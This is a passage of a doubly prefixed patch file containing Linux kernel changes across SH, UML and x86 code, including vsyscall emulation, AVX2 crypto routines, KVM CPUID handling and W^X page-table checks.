++++ b/arch/sh/kernel/kprobes.c
+@@ -44,17 +44,12 @@ int __kprobes arch_prepare_kprobe(struct kprobe *p)
+ 	if (OPCODE_RTE(opcode))
+ 		return -EFAULT;	/* Bad breakpoint */
+ 
++	memcpy(p->ainsn.insn, p->addr, MAX_INSN_SIZE * sizeof(kprobe_opcode_t));
+ 	p->opcode = opcode;
+ 
+ 	return 0;
+ }
+ 
+-void __kprobes arch_copy_kprobe(struct kprobe *p)
+-{
+-	memcpy(p->ainsn.insn, p->addr, MAX_INSN_SIZE * sizeof(kprobe_opcode_t));
+-	p->opcode = *p->addr;
+-}
+-
+ void __kprobes arch_arm_kprobe(struct kprobe *p)
+ {
+ 	*p->addr = BREAKPOINT_INSTRUCTION;
+diff --git a/arch/sh/lib/checksum.S b/arch/sh/lib/checksum.S
+index 3e07074e00981..06fed5a21e8ba 100644
+--- a/arch/sh/lib/checksum.S
++++ b/arch/sh/lib/checksum.S
+@@ -33,7 +33,8 @@
+  */
+ 
+ /*	
+- * asmlinkage __wsum csum_partial(const void *buf, int len, __wsum sum);
++ * unsigned int csum_partial(const unsigned char *buf, int len,
++ *                           unsigned int sum);
+  */
+ 
+ .text
+@@ -45,31 +46,11 @@ ENTRY(csum_partial)
+ 	   * Fortunately, it is easy to convert 2-byte alignment to 4-byte
+ 	   * alignment for the unrolled loop.
+ 	   */
++	mov	r5, r1
+ 	mov	r4, r0
+-	tst	#3, r0		! Check alignment.
+-	bt/s	2f		! Jump if alignment is ok.
+-	 mov	r4, r7		! Keep a copy to check for alignment
++	tst	#2, r0		! Check alignment.
++	bt	2f		! Jump if alignment is ok.
+ 	!
+-	tst	#1, r0		! Check alignment.
+-	bt	21f		! Jump if alignment is boundary of 2bytes.
+-
+-	! buf is odd
+-	tst	r5, r5
+-	add	#-1, r5
+-	bt	9f
+-	mov.b	@r4+, r0
+-	extu.b	r0, r0
+-	addc	r0, r6		! t=0 from previous tst
+-	mov	r6, r0
+-	shll8	r6
+-	shlr16	r0
+-	shlr8	r0
+-	or	r0, r6
+-	mov	r4, r0
+-	tst	#2, r0
+-	bt	2f
+-21:
+-	! buf is 2 byte aligned (len could be 0)
+ 	add	#-2, r5		! Alignment uses up two bytes.
+ 	cmp/pz	r5		!
+ 	bt/s	1f		! Jump if we had at least two bytes.
+@@ -77,17 +58,16 @@ ENTRY(csum_partial)
+ 	bra	6f
+ 	 add	#2, r5		! r5 was < 2.  Deal with it.
+ 1:
++	mov	r5, r1		! Save new len for later use.
+ 	mov.w	@r4+, r0
+ 	extu.w	r0, r0
+ 	addc	r0, r6
+ 	bf	2f
+ 	add	#1, r6
+ 2:
+-	! buf is 4 byte aligned (len could be 0)
+-	mov	r5, r1
+ 	mov	#-5, r0
+-	shld	r0, r1
+-	tst	r1, r1
++	shld	r0, r5
++	tst	r5, r5
+ 	bt/s	4f		! if it's =0, go to 4f
+ 	 clrt
+ 	.align	2
+@@ -109,31 +89,30 @@ ENTRY(csum_partial)
+ 	addc	r0, r6
+ 	addc	r2, r6
+ 	movt	r0
+-	dt	r1
++	dt	r5
+ 	bf/s	3b
+ 	 cmp/eq	#1, r0
+-	! here, we know r1==0
+-	addc	r1, r6			! add carry to r6
++	! here, we know r5==0
++	addc	r5, r6			! add carry to r6
+ 4:
+-	mov	r5, r0
++	mov	r1, r0
+ 	and	#0x1c, r0
+ 	tst	r0, r0
+-	bt	6f
+-	! 4 bytes or more remaining
+-	mov	r0, r1
+-	shlr2	r1
++	bt/s	6f
++	 mov	r0, r5
++	shlr2	r5
+ 	mov	#0, r2
+ 5:
+ 	addc	r2, r6
+ 	mov.l	@r4+, r2
+ 	movt	r0
+-	dt	r1
++	dt	r5
+ 	bf/s	5b
+ 	 cmp/eq	#1, r0
+ 	addc	r2, r6
+-	addc	r1, r6		! r1==0 here, so it means add carry-bit
++	addc	r5, r6		! r5==0 here, so it means add carry-bit
+ 6:
+-	! 3 bytes or less remaining
++	mov	r1, r5
+ 	mov	#3, r0
+ 	and	r0, r5
+ 	tst	r5, r5
+@@ -159,16 +138,6 @@ ENTRY(csum_partial)
+ 	mov	#0, r0
+ 	addc	r0, r6
+ 9:
+-	! Check if the buffer was misaligned, if so realign sum
+-	mov	r7, r0
+-	tst	#1, r0
+-	bt	10f
+-	mov	r6, r0
+-	shll8	r6
+-	shlr16	r0
+-	shlr8	r0
+-	or	r0, r6
+-10:
+ 	rts
+ 	 mov	r6, r0
+ 
+diff --git a/arch/um/drivers/line.c b/arch/um/drivers/line.c
+index 02b0befd67632..95ad6b190d1d1 100644
+--- a/arch/um/drivers/line.c
++++ b/arch/um/drivers/line.c
+@@ -673,24 +673,26 @@ void register_winch_irq(int fd, int tty_fd, int pid, struct tty_port *port,
+ 		goto cleanup;
+ 	}
+ 
+-	*winch = ((struct winch) { .list  	= LIST_HEAD_INIT(winch->list),
+-				   .fd  	= fd,
++	*winch = ((struct winch) { .fd  	= fd,
+ 				   .tty_fd 	= tty_fd,
+ 				   .pid  	= pid,
+ 				   .port 	= port,
+ 				   .stack	= stack });
+ 
++	spin_lock(&winch_handler_lock);
++	list_add(&winch->list, &winch_handlers);
++	spin_unlock(&winch_handler_lock);
++
+ 	if (um_request_irq(WINCH_IRQ, fd, IRQ_READ, winch_interrupt,
+ 			   IRQF_SHARED, "winch", winch) < 0) {
+ 		printk(KERN_ERR "register_winch_irq - failed to register "
+ 		       "IRQ\n");
++		spin_lock(&winch_handler_lock);
++		list_del(&winch->list);
++		spin_unlock(&winch_handler_lock);
+ 		goto out_free;
+ 	}
+ 
+-	spin_lock(&winch_handler_lock);
+-	list_add(&winch->list, &winch_handlers);
+-	spin_unlock(&winch_handler_lock);
+-
+ 	return;
+ 
+  out_free:
+diff --git a/arch/um/drivers/ubd_kern.c b/arch/um/drivers/ubd_kern.c
+index f4c1e6e97ad52..13a22a4613051 100644
+--- a/arch/um/drivers/ubd_kern.c
++++ b/arch/um/drivers/ubd_kern.c
+@@ -1099,7 +1099,7 @@ static int __init ubd_init(void)
+ 
+ 	if (irq_req_buffer == NULL) {
+ 		printk(KERN_ERR "Failed to initialize ubd buffering\n");
+-		return -1;
++		return -ENOMEM;
+ 	}
+ 	io_req_buffer = kmalloc_array(UBD_REQ_BUFFER_SIZE,
+ 				      sizeof(struct io_thread_req *),
+@@ -1110,7 +1110,7 @@ static int __init ubd_init(void)
+ 
+ 	if (io_req_buffer == NULL) {
+ 		printk(KERN_ERR "Failed to initialize ubd buffering\n");
+-		return -1;
++		return -ENOMEM;
+ 	}
+ 	platform_driver_register(&ubd_driver);
+ 	mutex_lock(&ubd_lock);
+diff --git a/arch/um/drivers/vector_kern.c b/arch/um/drivers/vector_kern.c
+index 131b7cb295767..94a4dfac6c236 100644
+--- a/arch/um/drivers/vector_kern.c
++++ b/arch/um/drivers/vector_kern.c
+@@ -141,7 +141,7 @@ static bool get_bpf_flash(struct arglist *def)
+ 
+ 	if (allow != NULL) {
+ 		if (kstrtoul(allow, 10, &result) == 0)
+-			return (allow > 0);
++			return result > 0;
+ 	}
+ 	return false;
+ }
+diff --git a/arch/um/include/asm/kasan.h b/arch/um/include/asm/kasan.h
+index 0d6547f4ec85c..f97bb1f7b8514 100644
+--- a/arch/um/include/asm/kasan.h
++++ b/arch/um/include/asm/kasan.h
+@@ -24,7 +24,6 @@
+ 
+ #ifdef CONFIG_KASAN
+ void kasan_init(void);
+-void kasan_map_memory(void *start, unsigned long len);
+ extern int kasan_um_is_ready;
+ 
+ #ifdef CONFIG_STATIC_LINK
+diff --git a/arch/um/include/asm/mmu.h b/arch/um/include/asm/mmu.h
+index 5b072aba5b658..a7cb380c0b5c0 100644
+--- a/arch/um/include/asm/mmu.h
++++ b/arch/um/include/asm/mmu.h
+@@ -15,8 +15,6 @@ typedef struct mm_context {
+ 	struct page *stub_pages[2];
+ } mm_context_t;
+ 
+-extern void __switch_mm(struct mm_id * mm_idp);
+-
+ /* Avoid tangled inclusion with asm/ldt.h */
+ extern long init_new_ldt(struct mm_context *to_mm, struct mm_context *from_mm);
+ extern void free_ldt(struct mm_context *mm);
+diff --git a/arch/um/include/asm/processor-generic.h b/arch/um/include/asm/processor-generic.h
+index bb5f06480da95..9adfcef579c1c 100644
+--- a/arch/um/include/asm/processor-generic.h
++++ b/arch/um/include/asm/processor-generic.h
+@@ -95,7 +95,6 @@ extern struct cpuinfo_um boot_cpu_data;
+ #define current_cpu_data boot_cpu_data
+ #define cache_line_size()	(boot_cpu_data.cache_alignment)
+ 
+-extern unsigned long get_thread_reg(int reg, jmp_buf *buf);
+ #define KSTK_REG(tsk, reg) get_thread_reg(reg, &tsk->thread.switch_buf)
+ extern unsigned long __get_wchan(struct task_struct *p);
+ 
+diff --git a/arch/um/include/shared/kern_util.h b/arch/um/include/shared/kern_util.h
+index 444bae755b16a..7372746c16875 100644
+--- a/arch/um/include/shared/kern_util.h
++++ b/arch/um/include/shared/kern_util.h
+@@ -67,4 +67,6 @@ extern void fatal_sigsegv(void) __attribute__ ((noreturn));
+ 
+ void um_idle_sleep(void);
+ 
++void kasan_map_memory(void *start, size_t len);
++
+ #endif
+diff --git a/arch/um/include/shared/skas/mm_id.h b/arch/um/include/shared/skas/mm_id.h
+index e82e203f5f419..92dbf727e3842 100644
+--- a/arch/um/include/shared/skas/mm_id.h
++++ b/arch/um/include/shared/skas/mm_id.h
+@@ -15,4 +15,6 @@ struct mm_id {
+ 	int kill;
+ };
+ 
++void __switch_mm(struct mm_id *mm_idp);
++
+ #endif
+diff --git a/arch/um/os-Linux/mem.c b/arch/um/os-Linux/mem.c
+index 8530b2e086049..c6c9495b14321 100644
+--- a/arch/um/os-Linux/mem.c
++++ b/arch/um/os-Linux/mem.c
+@@ -15,6 +15,7 @@
+ #include <sys/vfs.h>
+ #include <linux/magic.h>
+ #include <init.h>
++#include <kern_util.h>
+ #include <os.h>
+ 
+ /*
+diff --git a/arch/x86/Kconfig.debug b/arch/x86/Kconfig.debug
+index bdfe08f1a9304..584fb1eea2cbf 100644
+--- a/arch/x86/Kconfig.debug
++++ b/arch/x86/Kconfig.debug
+@@ -248,6 +248,7 @@ config UNWINDER_ORC
+ 
+ config UNWINDER_FRAME_POINTER
+ 	bool "Frame pointer unwinder"
++	select ARCH_WANT_FRAME_POINTERS
+ 	select FRAME_POINTER
+ 	help
+ 	  This option enables the frame pointer unwinder for unwinding kernel
+@@ -271,7 +272,3 @@ config UNWINDER_GUESS
+ 	  overhead.
+ 
+ endchoice
+-
+-config FRAME_POINTER
+-	depends on !UNWINDER_ORC && !UNWINDER_GUESS
+-	bool
+diff --git a/arch/x86/boot/compressed/head_64.S b/arch/x86/boot/compressed/head_64.S
+index 0d7aef10b19ad..6bc70385314cb 100644
+--- a/arch/x86/boot/compressed/head_64.S
++++ b/arch/x86/boot/compressed/head_64.S
+@@ -390,6 +390,11 @@ SYM_CODE_START(startup_64)
+ 	call	sev_enable
+ #endif
+ 
++	/* Preserve only the CR4 bits that must be preserved, and clear the rest */
++	movq	%cr4, %rax
++	andl	$(X86_CR4_PAE | X86_CR4_MCE | X86_CR4_LA57), %eax
++	movq	%rax, %cr4
++
+ 	/*
+ 	 * configure_5level_paging() updates the number of paging levels using
+ 	 * a trampoline in 32-bit addressable memory if the current number does
+diff --git a/arch/x86/crypto/nh-avx2-x86_64.S b/arch/x86/crypto/nh-avx2-x86_64.S
+index 6a0b15e7196a8..54c0ee41209d5 100644
+--- a/arch/x86/crypto/nh-avx2-x86_64.S
++++ b/arch/x86/crypto/nh-avx2-x86_64.S
+@@ -153,5 +153,6 @@ SYM_FUNC_START(nh_avx2)
+ 	vpaddq		T1, T0, T0
+ 	vpaddq		T4, T0, T0
+ 	vmovdqu		T0, (HASH)
++	vzeroupper
+ 	RET
+ SYM_FUNC_END(nh_avx2)
+diff --git a/arch/x86/crypto/sha256-avx2-asm.S b/arch/x86/crypto/sha256-avx2-asm.S
+index 2d2be531a11ed..eaa093f973cc3 100644
+--- a/arch/x86/crypto/sha256-avx2-asm.S
++++ b/arch/x86/crypto/sha256-avx2-asm.S
+@@ -711,6 +711,7 @@ done_hash:
+ 	popq	%r13
+ 	popq	%r12
+ 	popq	%rbx
++	vzeroupper
+ 	RET
+ SYM_FUNC_END(sha256_transform_rorx)
+ 
+diff --git a/arch/x86/crypto/sha512-avx2-asm.S b/arch/x86/crypto/sha512-avx2-asm.S
+index b1ca99055ef99..17d6c756b5414 100644
+--- a/arch/x86/crypto/sha512-avx2-asm.S
++++ b/arch/x86/crypto/sha512-avx2-asm.S
+@@ -680,6 +680,7 @@ done_hash:
+ 	pop	%r12
+ 	pop	%rbx
+ 
++	vzeroupper
+ 	RET
+ SYM_FUNC_END(sha512_transform_rorx)
+ 
+diff --git a/arch/x86/entry/vsyscall/vsyscall_64.c b/arch/x86/entry/vsyscall/vsyscall_64.c
+index 4af81df133ee8..5d4ca8b942939 100644
+--- a/arch/x86/entry/vsyscall/vsyscall_64.c
++++ b/arch/x86/entry/vsyscall/vsyscall_64.c
+@@ -98,11 +98,6 @@ static int addr_to_vsyscall_nr(unsigned long addr)
+ 
+ static bool write_ok_or_segv(unsigned long ptr, size_t size)
+ {
+-	/*
+-	 * XXX: if access_ok, get_user, and put_user handled
+-	 * sig_on_uaccess_err, this could go away.
+-	 */
+-
+ 	if (!access_ok((void __user *)ptr, size)) {
+ 		struct thread_struct *thread = &current->thread;
+ 
+@@ -120,10 +115,8 @@ static bool write_ok_or_segv(unsigned long ptr, size_t size)
+ bool emulate_vsyscall(unsigned long error_code,
+ 		      struct pt_regs *regs, unsigned long address)
+ {
+-	struct task_struct *tsk;
+ 	unsigned long caller;
+ 	int vsyscall_nr, syscall_nr, tmp;
+-	int prev_sig_on_uaccess_err;
+ 	long ret;
+ 	unsigned long orig_dx;
+ 
+@@ -172,8 +165,6 @@ bool emulate_vsyscall(unsigned long error_code,
+ 		goto sigsegv;
+ 	}
+ 
+-	tsk = current;
+-
+ 	/*
+ 	 * Check for access_ok violations and find the syscall nr.
+ 	 *
+@@ -234,12 +225,8 @@ bool emulate_vsyscall(unsigned long error_code,
+ 		goto do_ret;  /* skip requested */
+ 
+ 	/*
+-	 * With a real vsyscall, page faults cause SIGSEGV.  We want to
+-	 * preserve that behavior to make writing exploits harder.
++	 * With a real vsyscall, page faults cause SIGSEGV.
+ 	 */
+-	prev_sig_on_uaccess_err = current->thread.sig_on_uaccess_err;
+-	current->thread.sig_on_uaccess_err = 1;
+-
+ 	ret = -EFAULT;
+ 	switch (vsyscall_nr) {
+ 	case 0:
+@@ -262,23 +249,12 @@ bool emulate_vsyscall(unsigned long error_code,
+ 		break;
+ 	}
+ 
+-	current->thread.sig_on_uaccess_err = prev_sig_on_uaccess_err;
+-
+ check_fault:
+ 	if (ret == -EFAULT) {
+ 		/* Bad news -- userspace fed a bad pointer to a vsyscall. */
+ 		warn_bad_vsyscall(KERN_INFO, regs,
+ 				  "vsyscall fault (exploit attempt?)");
+-
+-		/*
+-		 * If we failed to generate a signal for any reason,
+-		 * generate one here.  (This should be impossible.)
+-		 */
+-		if (WARN_ON_ONCE(!sigismember(&tsk->pending.signal, SIGBUS) &&
+-				 !sigismember(&tsk->pending.signal, SIGSEGV)))
+-			goto sigsegv;
+-
+-		return true;  /* Don't emulate the ret. */
++		goto sigsegv;
+ 	}
+ 
+ 	regs->ax = ret;
+diff --git a/arch/x86/include/asm/pgtable_types.h b/arch/x86/include/asm/pgtable_types.h
+index f0b9b37c4609b..e3028373f0b45 100644
+--- a/arch/x86/include/asm/pgtable_types.h
++++ b/arch/x86/include/asm/pgtable_types.h
+@@ -544,6 +544,8 @@ static inline void update_page_count(int level, unsigned long pages) { }
+ extern pte_t *lookup_address(unsigned long address, unsigned int *level);
+ extern pte_t *lookup_address_in_pgd(pgd_t *pgd, unsigned long address,
+ 				    unsigned int *level);
++pte_t *lookup_address_in_pgd_attr(pgd_t *pgd, unsigned long address,
++				  unsigned int *level, bool *nx, bool *rw);
+ extern pmd_t *lookup_pmd_address(unsigned long address);
+ extern phys_addr_t slow_virt_to_phys(void *__address);
+ extern int __init kernel_map_pages_in_pgd(pgd_t *pgd, u64 pfn,
+diff --git a/arch/x86/include/asm/processor.h b/arch/x86/include/asm/processor.h
+index 94ea13adb724a..3ed6cc7785037 100644
+--- a/arch/x86/include/asm/processor.h
++++ b/arch/x86/include/asm/processor.h
+@@ -519,7 +519,6 @@ struct thread_struct {
+ 	unsigned long		iopl_emul;
+ 
+ 	unsigned int		iopl_warn:1;
+-	unsigned int		sig_on_uaccess_err:1;
+ 
+ 	/*
+ 	 * Protection Keys Register for Userspace.  Loaded immediately on
+diff --git a/arch/x86/include/asm/sparsemem.h b/arch/x86/include/asm/sparsemem.h
+index 1be13b2dfe8bf..64df897c0ee30 100644
+--- a/arch/x86/include/asm/sparsemem.h
++++ b/arch/x86/include/asm/sparsemem.h
+@@ -37,8 +37,6 @@ extern int phys_to_target_node(phys_addr_t start);
+ #define phys_to_target_node phys_to_target_node
+ extern int memory_add_physaddr_to_nid(u64 start);
+ #define memory_add_physaddr_to_nid memory_add_physaddr_to_nid
+-extern int numa_fill_memblks(u64 start, u64 end);
+-#define numa_fill_memblks numa_fill_memblks
+ #endif
+ #endif /* __ASSEMBLY__ */
+ 
+diff --git a/arch/x86/kernel/apic/vector.c b/arch/x86/kernel/apic/vector.c
+index 3e6f6b448f6aa..d261b4c207d05 100644
+--- a/arch/x86/kernel/apic/vector.c
++++ b/arch/x86/kernel/apic/vector.c
+@@ -982,7 +982,8 @@ static void __send_cleanup_vector(struct apic_chip_data *apicd)
+ 		hlist_add_head(&apicd->clist, per_cpu_ptr(&cleanup_list, cpu));
+ 		apic->send_IPI(cpu, IRQ_MOVE_CLEANUP_VECTOR);
+ 	} else {
+-		apicd->prev_vector = 0;
++		pr_warn("IRQ %u schedule cleanup for offline CPU %u\n", apicd->irq, cpu);
++		free_moved_vector(apicd);
+ 	}
+ 	raw_spin_unlock(&vector_lock);
+ }
+@@ -1019,6 +1020,7 @@ void irq_complete_move(struct irq_cfg *cfg)
+  */
+ void irq_force_complete_move(struct irq_desc *desc)
+ {
++	unsigned int cpu = smp_processor_id();
+ 	struct apic_chip_data *apicd;
+ 	struct irq_data *irqd;
+ 	unsigned int vector;
+@@ -1043,10 +1045,11 @@ void irq_force_complete_move(struct irq_desc *desc)
+ 		goto unlock;
+ 
+ 	/*
+-	 * If prev_vector is empty, no action required.
++	 * If prev_vector is empty or the descriptor is neither currently
++	 * nor previously on the outgoing CPU no action required.
+ 	 */
+ 	vector = apicd->prev_vector;
+-	if (!vector)
++	if (!vector || (apicd->cpu != cpu && apicd->prev_cpu != cpu))
+ 		goto unlock;
+ 
+ 	/*
+diff --git a/arch/x86/kernel/tsc_sync.c b/arch/x86/kernel/tsc_sync.c
+index 9452dc9664b51..7a1e3f53be24b 100644
+--- a/arch/x86/kernel/tsc_sync.c
++++ b/arch/x86/kernel/tsc_sync.c
+@@ -192,11 +192,9 @@ bool tsc_store_and_check_tsc_adjust(bool bootcpu)
+ 	cur->warned = false;
+ 
+ 	/*
+-	 * If a non-zero TSC value for socket 0 may be valid then the default
+-	 * adjusted value cannot assumed to be zero either.
++	 * The default adjust value cannot be assumed to be zero on any socket.
+ 	 */
+-	if (tsc_async_resets)
+-		cur->adjusted = bootval;
++	cur->adjusted = bootval;
+ 
+ 	/*
+ 	 * Check whether this CPU is the first in a package to come up. In
+diff --git a/arch/x86/kvm/cpuid.c b/arch/x86/kvm/cpuid.c
+index f02961cbbb75a..3818c85cf964e 100644
+--- a/arch/x86/kvm/cpuid.c
++++ b/arch/x86/kvm/cpuid.c
+@@ -1157,9 +1157,8 @@ static inline int __do_cpuid_func(struct kvm_cpuid_array *array, u32 function)
+ 		entry->eax = entry->ebx = entry->ecx = 0;
+ 		break;
+ 	case 0x80000008: {
+-		unsigned g_phys_as = (entry->eax >> 16) & 0xff;
+-		unsigned virt_as = max((entry->eax >> 8) & 0xff, 48U);
+-		unsigned phys_as = entry->eax & 0xff;
++		unsigned int virt_as = max((entry->eax >> 8) & 0xff, 48U);
++		unsigned int phys_as;
+ 
+ 		/*
+ 		 * If TDP (NPT) is disabled use the adjusted host MAXPHYADDR as
+@@ -1167,16 +1166,16 @@ static inline int __do_cpuid_func(struct kvm_cpuid_array *array, u32 function)
+ 		 * reductions in MAXPHYADDR for memory encryption affect shadow
+ 		 * paging, too.
+ 		 *
+-		 * If TDP is enabled but an explicit guest MAXPHYADDR is not
+-		 * provided, use the raw bare metal MAXPHYADDR as reductions to
+-		 * the HPAs do not affect GPAs.
++		 * If TDP is enabled, use the raw bare metal MAXPHYADDR as
++		 * reductions to the HPAs do not affect GPAs.
+ 		 */
+-		if (!tdp_enabled)
+-			g_phys_as = boot_cpu_data.x86_phys_bits;
+-		else if (!g_phys_as)
+-			g_phys_as = phys_as;
++		if (!tdp_enabled) {
++			phys_as = boot_cpu_data.x86_phys_bits;
++		} else {
++			phys_as = entry->eax & 0xff;
++		}
+ 
+-		entry->eax = g_phys_as | (virt_as << 8);
++		entry->eax = phys_as | (virt_as << 8);
+ 		entry->ecx &= ~(GENMASK(31, 16) | GENMASK(11, 8));
+ 		entry->edx = 0;
+ 		cpuid_entry_override(entry, CPUID_8000_0008_EBX);
+diff --git a/arch/x86/lib/x86-opcode-map.txt b/arch/x86/lib/x86-opcode-map.txt
+index d12d1358f96d2..8eaf140172c58 100644
+--- a/arch/x86/lib/x86-opcode-map.txt
++++ b/arch/x86/lib/x86-opcode-map.txt
+@@ -148,7 +148,7 @@ AVXcode:
+ 65: SEG=GS (Prefix)
+ 66: Operand-Size (Prefix)
+ 67: Address-Size (Prefix)
+-68: PUSH Iz (d64)
++68: PUSH Iz
+ 69: IMUL Gv,Ev,Iz
+ 6a: PUSH Ib (d64)
+ 6b: IMUL Gv,Ev,Ib
+@@ -698,10 +698,10 @@ AVXcode: 2
+ 4d: vrcp14ss/d Vsd,Hpd,Wsd (66),(ev)
+ 4e: vrsqrt14ps/d Vpd,Wpd (66),(ev)
+ 4f: vrsqrt14ss/d Vsd,Hsd,Wsd (66),(ev)
+-50: vpdpbusd Vx,Hx,Wx (66),(ev)
+-51: vpdpbusds Vx,Hx,Wx (66),(ev)
+-52: vdpbf16ps Vx,Hx,Wx (F3),(ev) | vpdpwssd Vx,Hx,Wx (66),(ev) | vp4dpwssd Vdqq,Hdqq,Wdq (F2),(ev)
+-53: vpdpwssds Vx,Hx,Wx (66),(ev) | vp4dpwssds Vdqq,Hdqq,Wdq (F2),(ev)
++50: vpdpbusd Vx,Hx,Wx (66)
++51: vpdpbusds Vx,Hx,Wx (66)
++52: vdpbf16ps Vx,Hx,Wx (F3),(ev) | vpdpwssd Vx,Hx,Wx (66) | vp4dpwssd Vdqq,Hdqq,Wdq (F2),(ev)
++53: vpdpwssds Vx,Hx,Wx (66) | vp4dpwssds Vdqq,Hdqq,Wdq (F2),(ev)
+ 54: vpopcntb/w Vx,Wx (66),(ev)
+ 55: vpopcntd/q Vx,Wx (66),(ev)
+ 58: vpbroadcastd Vx,Wx (66),(v)
+diff --git a/arch/x86/mm/fault.c b/arch/x86/mm/fault.c
+index f20636510eb1e..2fc007752ceb1 100644
+--- a/arch/x86/mm/fault.c
++++ b/arch/x86/mm/fault.c
+@@ -737,39 +737,8 @@ kernelmode_fixup_or_oops(struct pt_regs *regs, unsigned long error_code,
+ 	WARN_ON_ONCE(user_mode(regs));
+ 
+ 	/* Are we prepared to handle this kernel fault? */
+-	if (fixup_exception(regs, X86_TRAP_PF, error_code, address)) {
+-		/*
+-		 * Any interrupt that takes a fault gets the fixup. This makes
+-		 * the below recursive fault logic only apply to a faults from
+-		 * task context.
+-		 */
+-		if (in_interrupt())
+-			return;
+-
+-		/*
+-		 * Per the above we're !in_interrupt(), aka. task context.
+-		 *
+-		 * In this case we need to make sure we're not recursively
+-		 * faulting through the emulate_vsyscall() logic.
+-		 */
+-		if (current->thread.sig_on_uaccess_err && signal) {
+-			sanitize_error_code(address, &error_code);
+-
+-			set_signal_archinfo(address, error_code);
+-
+-			if (si_code == SEGV_PKUERR) {
+-				force_sig_pkuerr((void __user *)address, pkey);
+-			} else {
+-				/* XXX: hwpoison faults will set the wrong code. */
+-				force_sig_fault(signal, si_code, (void __user *)address);
+-			}
+-		}
+-
+-		/*
+-		 * Barring that, we can do the fixup and be happy.
+-		 */
++	if (fixup_exception(regs, X86_TRAP_PF, error_code, address))
+ 		return;
+-	}
+ 
+ 	/*
+ 	 * AMD erratum #91 manifests as a spurious page fault on a PREFETCH
+diff --git a/arch/x86/mm/numa.c b/arch/x86/mm/numa.c
+index dae5c952735c7..c7fa5396c0f05 100644
+--- a/arch/x86/mm/numa.c
++++ b/arch/x86/mm/numa.c
+@@ -956,6 +956,8 @@ int memory_add_physaddr_to_nid(u64 start)
+ }
+ EXPORT_SYMBOL_GPL(memory_add_physaddr_to_nid);
+ 
++#endif
++
+ static int __init cmp_memblk(const void *a, const void *b)
+ {
+ 	const struct numa_memblk *ma = *(const struct numa_memblk **)a;
+@@ -1028,5 +1030,3 @@ int __init numa_fill_memblks(u64 start, u64 end)
+ 	}
+ 	return 0;
+ }
+-
+-#endif
+diff --git a/arch/x86/mm/pat/set_memory.c b/arch/x86/mm/pat/set_memory.c
+index 68d4f328f1696..fd412dec01259 100644
+--- a/arch/x86/mm/pat/set_memory.c
++++ b/arch/x86/mm/pat/set_memory.c
+@@ -583,7 +583,8 @@ static inline pgprot_t static_protections(pgprot_t prot, unsigned long start,
+  * Validate strict W^X semantics.
+  */
+ static inline pgprot_t verify_rwx(pgprot_t old, pgprot_t new, unsigned long start,
+-				  unsigned long pfn, unsigned long npg)
++				  unsigned long pfn, unsigned long npg,
++				  bool nx, bool rw)
+ {
+ 	unsigned long end;
+ 
+@@ -609,6 +610,10 @@ static inline pgprot_t verify_rwx(pgprot_t old, pgprot_t new, unsigned long star
+ 	if ((pgprot_val(new) & (_PAGE_RW | _PAGE_NX)) != _PAGE_RW)
+ 		return new;
+ 
++	/* Non-leaf translation entries can disable writing or execution. */
++	if (!rw || nx)
++		return new;
++
+ 	end = start + npg * PAGE_SIZE - 1;
+ 	WARN_ONCE(1, "CPA detected W^X violation: %016llx -> %016llx range: 0x%016lx - 0x%016lx PFN %lx\n",
+ 		  (unsigned long long)pgprot_val(old),
+@@ -625,20 +630,26 @@ static inline pgprot_t verify_rwx(pgprot_t old, pgprot_t new, unsigned long star
+ 
+ /*
+  * Lookup the page table entry for a virtual address in a specific pgd.
+- * Return a pointer to the entry and the level of the mapping.
++ * Return a pointer to the entry, the level of the mapping, and the effective
++ * NX and RW bits of all page table levels.
+  */
+-pte_t *lookup_address_in_pgd(pgd_t *pgd, unsigned long address,
+-			     unsigned int *level)
++pte_t *lookup_address_in_pgd_attr(pgd_t *pgd, unsigned long address,
++				  unsigned int *level, bool *nx, bool *rw)
+ {
+ 	p4d_t *p4d;
+ 	pud_t *pud;
+ 	pmd_t *pmd;
+ 
+ 	*level = PG_LEVEL_NONE;
++	*nx = false;
++	*rw = true;
+ 
+ 	if (pgd_none(*pgd))
+ 		return NULL;
+ 
++	*nx |= pgd_flags(*pgd) & _PAGE_NX;
++	*rw &= pgd_flags(*pgd) & _PAGE_RW;
++
+ 	p4d = p4d_offset(pgd, address);
+ 	if (p4d_none(*p4d))
+ 		return NULL;
+@@ -647,6 +658,9 @@ pte_t *lookup_address_in_pgd(pgd_t *pgd, unsigned long address,
+ 	if (p4d_large(*p4d) || !p4d_present(*p4d))
+ 		return (pte_t *)p4d;
+ 
++	*nx |= p4d_flags(*p4d) & _PAGE_NX;
++	*rw &= p4d_flags(*p4d) & _PAGE_RW;
++
+ 	pud = pud_offset(p4d, address);
+ 	if (pud_none(*pud))
+ 		return NULL;
+@@ -655,6 +669,9 @@ pte_t *lookup_address_in_pgd(pgd_t *pgd, unsigned long address,
+ 	if (pud_large(*pud) || !pud_present(*pud))
+ 		return (pte_t *)pud;
+ 
++	*nx |= pud_flags(*pud) & _PAGE_NX;
++	*rw &= pud_flags(*pud) & _PAGE_RW;
++
+ 	pmd = pmd_offset(pud, address);
+ 	if (pmd_none(*pmd))
+ 		return NULL;
+@@ -663,11 +680,26 @@ pte_t *lookup_address_in_pgd(pgd_t *pgd, unsigned long address,
+ 	if (pmd_large(*pmd) || !pmd_present(*pmd))
+ 		return (pte_t *)pmd;
+ 
++	*nx |= pmd_flags(*pmd) & _PAGE_NX;
++	*rw &= pmd_flags(*pmd) & _PAGE_RW;
++
+ 	*level = PG_LEVEL_4K;
+ 
+ 	return pte_offset_kernel(pmd, address);
+ }
+ 
++/*
++ * Lookup the page table entry for a virtual address in a specific pgd.
++ * Return a pointer to the entry and the level of the mapping.
++ */
++pte_t *lookup_address_in_pgd(pgd_t *pgd, unsigned long address,
++			     unsigned int *level)
++{
++	bool nx, rw;
++
++	return lookup_address_in_pgd_attr(pgd, address, level, &nx, &rw);
++}
++
+ /*
+  * Lookup the page table entry for a virtual address. Return a pointer
+  * to the entry and the level of the mapping.
+@@ -683,13 +715,16 @@ pte_t *lookup_address(unsigned long address, unsigned int *level)
+ EXPORT_SYMBOL_GPL(lookup_address);
+ 
+ static pte_t *_lookup_address_cpa(struct cpa_data *cpa, unsigned long address,
+-				  unsigned int *level)
++				  unsigned int *level, bool *nx, bool *rw)
+ {
+-	if (cpa->pgd)
+-		return lookup_address_in_pgd(cpa->pgd + pgd_index(address),
+-					       address, level);
++	pgd_t *pgd;
++
++	if (!cpa->pgd)
++		pgd = pgd_offset_k(address);
++	else
++		pgd = cpa->pgd + pgd_index(address);
+ 
+-	return lookup_address(address, level);
++	return lookup_address_in_pgd_attr(pgd, address, level, nx, rw);
+ }
+ 
+ /*
